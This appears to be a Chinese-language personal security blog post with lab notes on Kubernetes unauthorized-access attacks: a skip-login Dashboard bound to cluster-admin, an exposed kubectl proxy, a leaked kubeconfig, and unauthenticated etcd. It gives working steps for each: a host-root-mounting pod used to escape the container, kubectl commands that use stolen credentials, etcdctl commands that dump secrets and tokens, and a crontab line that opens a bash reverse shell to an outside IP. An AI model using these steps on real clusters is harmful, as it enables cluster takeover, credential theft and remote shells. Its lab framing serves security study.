Skip to main content

K8s-2-未授权访问-proxy

·931 words·5 mins
IIIIIIIIIIII
Author
IIIIIIIIIIII
A little bit about you

K8s-2-未授权访问
#

K8S集群安装配置在上个博客

K8S集群渗透
#

1

确保都running不然实验不行而且版本要合适

注意:k8s里面的pod采用的是yaml语法 docker采用dockerfile

1:Dashboard未授权访问8001
#

默认端口:8001
配置不当导致dashboard未授权访问,通过dashboard可以控制整个集群。
kubernetes dashboard的未授权其实分两种情况:
一种是在本身就存在着不需要登录的http接口,但接口本身并不会暴露出来,如接口被暴露在外,就会导致dashboard未授权。另外一种情况则是开发嫌登录麻烦,修改了配置文件,使得安全接口https的dashboard页面可以跳过登录。

*复现利用:
*用户开启enable-skip-login时可以在登录界面点击跳过登录进dashboard
*Kubernetes-dashboard绑定cluster-admin(拥有管理集群的最高权限)
1、安装:https://blog.csdn.net/justlpf/article/details/130718774
2、启动:kubectl create -f recommended.yaml --valid=false  这里我用node的IP进去了 
3、卸载:kubectl delete -f recommended.yaml
4、查看:kubectl get pod,svc -n kubernetes-dashboard
5、利用:新增Pod后续同前面利用一致
*找到暴露面板->dashboard跳过-创建或上传pod->进入执行-利用挂载逃逸

recommended.yaml
# Copyright 2017 The Kubernetes Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

apiVersion: v1
kind: Namespace
metadata:
  name: kubernetes-dashboard

---

apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  type: NodePort
  ports:
    - port: 443
      targetPort: 8443
      nodePort: 30009
  selector:
    k8s-app: kubernetes-dashboard

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-certs
  namespace: kubernetes-dashboard
type: Opaque

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-csrf
  namespace: kubernetes-dashboard
type: Opaque
data:
  csrf: ""

---

apiVersion: v1
kind: Secret
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-key-holder
  namespace: kubernetes-dashboard
type: Opaque

---

kind: ConfigMap
apiVersion: v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard-settings
  namespace: kubernetes-dashboard

---

kind: Role
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
rules:
  # Allow Dashboard to get, update and delete Dashboard exclusive secrets.
  - apiGroups: [""]
    resources: ["secrets"]
    resourceNames: ["kubernetes-dashboard-key-holder", "kubernetes-dashboard-certs", "kubernetes-dashboard-csrf"]
    verbs: ["get", "update", "delete"]
    # Allow Dashboard to get and update 'kubernetes-dashboard-settings' config map.
  - apiGroups: [""]
    resources: ["configmaps"]
    resourceNames: ["kubernetes-dashboard-settings"]
    verbs: ["get", "update"]
    # Allow Dashboard to get metrics.
  - apiGroups: [""]
    resources: ["services"]
    resourceNames: ["heapster", "dashboard-metrics-scraper"]
    verbs: ["proxy"]
  - apiGroups: [""]
    resources: ["services/proxy"]
    resourceNames: ["heapster", "http:heapster:", "https:heapster:", "dashboard-metrics-scraper", "http:dashboard-metrics-scraper"]
    verbs: ["get"]

---

kind: ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
rules:
  # Allow Metrics Scraper to get metrics from the Metrics server
  - apiGroups: ["metrics.k8s.io"]
    resources: ["pods", "nodes"]
    verbs: ["get", "list", "watch"]

---

apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: kubernetes-dashboard
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: kubernetes-dashboard
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: kubernetes-dashboard
    namespace: kubernetes-dashboard

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: kubernetes-dashboard
  name: kubernetes-dashboard
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: kubernetes-dashboard
  template:
    metadata:
      labels:
        k8s-app: kubernetes-dashboard
    spec:
      securityContext:
        seccompProfile:
          type: RuntimeDefault
      containers:
        - name: kubernetes-dashboard
          image: kubernetesui/dashboard:v2.5.0
          imagePullPolicy: Always
          ports:
            - containerPort: 8443
              protocol: TCP
          args:
            - --enable-skip-login
            - --auto-generate-certificates
            - --namespace=kubernetes-dashboard
            # Uncomment the following line to manually specify Kubernetes API server Host
            # If not specified, Dashboard will attempt to auto discover the API server and connect
            # to it. Uncomment only if the default does not work.
            # - --apiserver-host=http://my-address:port
          volumeMounts:
            - name: kubernetes-dashboard-certs
              mountPath: /certs
              # Create on-disk volume to store exec logs
            - mountPath: /tmp
              name: tmp-volume
          livenessProbe:
            httpGet:
              scheme: HTTPS
              path: /
              port: 8443
            initialDelaySeconds: 30
            timeoutSeconds: 30
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      volumes:
        - name: kubernetes-dashboard-certs
          secret:
            secretName: kubernetes-dashboard-certs
        - name: tmp-volume
          emptyDir: {}
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule

---

kind: Service
apiVersion: v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  ports:
    - port: 8000
      targetPort: 8000
  selector:
    k8s-app: dashboard-metrics-scraper

---

kind: Deployment
apiVersion: apps/v1
metadata:
  labels:
    k8s-app: dashboard-metrics-scraper
  name: dashboard-metrics-scraper
  namespace: kubernetes-dashboard
spec:
  replicas: 1
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      k8s-app: dashboard-metrics-scraper
  template:
    metadata:
      labels:
        k8s-app: dashboard-metrics-scraper
    spec:
      securityContext:
        seccompProfile:
          type: RuntimeDefault
      containers:
        - name: dashboard-metrics-scraper
          image: kubernetesui/metrics-scraper:v1.0.7
          ports:
            - containerPort: 8000
              protocol: TCP
          livenessProbe:
            httpGet:
              scheme: HTTP
              path: /
              port: 8000
            initialDelaySeconds: 30
            timeoutSeconds: 30
          volumeMounts:
          - mountPath: /tmp
            name: tmp-volume
          securityContext:
            allowPrivilegeEscalation: false
            readOnlyRootFilesystem: true
            runAsUser: 1001
            runAsGroup: 2001
      serviceAccountName: kubernetes-dashboard
      nodeSelector:
        "kubernetes.io/os": linux
      # Comment the following tolerations if Dashboard must not be deployed on master
      tolerations:
        - key: node-role.kubernetes.io/master
          effect: NoSchedule
      volumes:
        - name: tmp-volume
          emptyDir: {}

1

点击跳过可以直接进去记得换浏览器

1

点击PODS -> 点击加号上传恶意pods

1

test.yaml
apiVersion: v1
kind: Pod
metadata:
  name: hajimedie
spec:
  containers:
  - image: nginx
    name: hajimedie
    volumeMounts:
    - mountPath: /mnt
      name: test-volume
  volumes:
  - name: test-volume
    hostPath:
      path: /

成功后进入带有恶意挂载逃逸的shell界面

1

做完实验删除kubectl delete -f recommended.yaml

2:Proxy代理未授权
#

当运维人员需要某个环境暴露端口或者IP时,会用到Kubectl Proxy

使用kubectl proxy命令就可以使API server监听在本地的xxxx端口上

环境搭建:

kubectl --insecure-skip-tls-verify proxy --accept-hosts=^.*$ --address=0.0.0.0 --port=8009
把APISERBER代理带8009端口了

就和第一个博客的APIserver未授权攻击一样了

1

1

接下来就是上传pods 拿shell逃逸和第一个博客一样了

3:Config鉴权文件泄漏
#

攻击者通过Webshell、Github等拿到了K8s配置的Config文件,操作集群,从而接管所有容器。K8s configfile作为K8s集群的管理凭证,其中包含有关K8s集群的详细信息(API Server、登录凭证)。
默认位置
/root/.kube/config
[root@master-1 .kube]# ls -al
total 16
drwxr-xr-x. 4 root root   51 Aug 27 23:25 .
dr-xr-x---. 6 root root 4096 Aug 28 23:41 ..
drwxr-x---. 3 root root   23 Aug 27 23:25 cache
-rw-------. 1 root root 5450 Aug 27 23:25 config
drwxr-x---. 3 root root 4096 Aug 28 23:38 http-cache
[root@master-1 .kube]# 

kubectl -s https://192.168.79.131:6443/ –kubeconfig=config –insecure-skip-tls-verify=true get nodes

然后用上传pods 登录 挂载逃逸

kubectl -s https://192.168.79.131:6443/ –kubeconfig=config –insecure-skip-tls-verify=true apply -f test.yaml -n default –kubeconfig=config

kubectl -s https://192.168.79.131:6443/ –kubeconfig=config –insecure-skip-tls-verify=true exec -it xiaodisec bash -n default –kubeconfig=config

反弹

echo -e “* * * * * root bash -i >& /dev/tcp/192.168.79.131/4444 0>&1\n” » /mnt/etc/crontab

4:etcd未授权访问
#

etcd 

保存了整个集群的状态
/etc/kubernetes/manifests/etcd.yaml
systemctl restart kubelet.service 重启

--client-cert-auth 设置为false即可不用验证 没有暴露就用SSRF  

--listen-cilent-url=后面IP如果是127.0.0.1表示只允许内部访问 但是SSRF可绕过
三种方法:
第一种:没有配置指定--client-cert-auth 参数打开证书校验,暴露在外Etcd服务存在未授权访问风险。
-暴露外部可以访问,直接未授权访问获取secrets和token利用

第二种:在打开证书校验选项后,通过本地127.0.0.1:2379可免认证访问Etcd服务,但通过其他地址访问要携带cert进行认证访问,一般配合ssrf或其他利用,较为鸡肋。
-只能本地访问,直接未授权访问获取secrets和token利用

第三种:实战中在安装k8s默认的配置2379只会监听本地,如果访问没设置0.0.0.0暴露,那么也就意味着最多就是本地访问,不能公网访问,只能配合ssrf或其他。
-只能本地访问,利用ssrf或其他进行获取secrets和token利用


*复现利用:
*暴露etcd未授权->获取secrets&token->通过访问API-Server接管
*SSRF绕限制访问->获取secrets&token->通过token访问API-Server
*V2/V3版本利用参考:https://www.cnblogs.com/qtzd/p/k8s_etcd.html

./etcdctl –endpoints=192.168.79.131:23791 get / –prefix –keys-only | grep /secrets/

读取service account token:

./etcdctl –endpoints=192.168.79.131:23791 get / –prefix –keys-only | grep /secrets/kube-system/clusterrole

./etcdctl –endpoints=192.168.79.131:23791 get /registry/secrets/kube-system/clusterrole-aggregation-controller-token-jdp5z

通过token访问API-Server,获取集群的权限:

kubectl –insecure-skip-tls-verify -s https://192.168.79.131:6443/ –token=“xxxxx” -n kube-system get pods

Related

K8s-1-未授权访问
·977 words·5 mins
Pane12靶机-VITE
·27 words·1 min
CodeTwo靶机-HTB
·157 words·1 min
Docker-逃逸-LINux内核漏洞
·216 words·2 mins
Docker-逃逸-本身漏洞-CDK工具使用
·241 words·2 mins